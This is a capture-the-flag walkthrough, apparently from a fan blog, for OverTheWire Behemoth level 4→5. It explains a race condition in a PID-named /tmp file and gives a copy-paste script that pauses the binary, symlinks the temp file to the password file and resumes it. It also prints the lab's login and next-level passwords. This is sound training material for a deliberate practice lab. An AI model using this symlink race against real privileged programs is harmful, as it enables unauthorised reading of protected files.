🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠
OverTheWire Behemoth Level 4 → 5 tutorial!!
Login
Log in as behemoth4 using the password you obtained from Level 3 → 4.
ssh behemoth4@behemoth.labs.overthewire.org -p 2221
# password: ietheishei
Task
The binary /behemoth/behemoth4 creates a temporary file named after its own PID in /tmp/, then re-opens it.
If that file doesn’t exist, the program fails.
We can exploit this with a race condition: pause the program, replace /tmp/<pid> with a symlink to the password file, then let it continue.
A little bit of Theory
- PID: every process on Linux has a unique process ID.
$!expands to the PID of the last background job. - Race condition: a flaw where program behavior depends on exact timing. If attacker can pause or delay, they can swap resources at the right moment.
- Symlink attack: creating a symbolic link
/tmp/<pid>→/etc/behemoth_pass/behemoth5. When program re-opens/tmp/<pid>, it actually opens the password file. -
Signals:
kill -STOP <pid>pauses a process (like Ctrl+Z).kill -CONT <pid>resumes it.
Solution
1. Run the binary normally
cd /behemoth
./behemoth4
It exits immediately with no output. Suspicious. Let’s trace syscalls:
strace ./behemoth4
Key lines:
open("/tmp/18680", O_WRONLY|O_CREAT|O_TRUNC, 0600) = 3
close(3)
open("/tmp/18680", O_RDONLY) = -1 ENOENT (No such file or directory)
Explanation: The program:
- Creates
/tmp/<pid> - Closes it
- Immediately re-opens it → file missing! That’s our race condition.
2. Run in background to capture PID
/behemoth/behemoth4 &
PID=$!
&→ run program in background.$!→ stores PID of last background command.
Check:
echo $PID
# e.g. 19283
3. Pause the process
kill -STOP $PID
Program is now frozen right after creating /tmp/$PID.
4. Create symlink
Replace the expected temp file with a symlink to the real password file:
ln -s /etc/behemoth_pass/behemoth5 /tmp/$PID
Now /tmp/19283 actually points to /etc/behemoth_pass/behemoth5.
5. Resume process
kill -CONT $PID
When the program continues, it opens /tmp/$PID again. Because it’s now a symlink, it reveals the next password:
aizeeshing
Password
aizeeshing
Troubleshooting
- Process ends too fast → Make sure to pause quickly (
kill -STOP) or run it in background immediately. - Wrong symlink → Verify
$PIDmatches filename in/tmp. - Permission denied → Only symlink inside
/tmpis allowed. - Didn’t print password → Retry; race exploits are timing-sensitive.
Copy-paste quick run
ssh behemoth4@behemoth.labs.overthewire.org -p 2221
/behemoth/behemoth4 &
PID=$!
kill -STOP $PID
ln -s /etc/behemoth_pass/behemoth5 /tmp/$PID
kill -CONT $PID
Congrats 🎉 You exploited a race condition with PID-based temp files and used a symlink to read the next password. Welcome to behemoth5!
Thanks for reading!
Until next time — Otsumachi!! 💖☄️✨
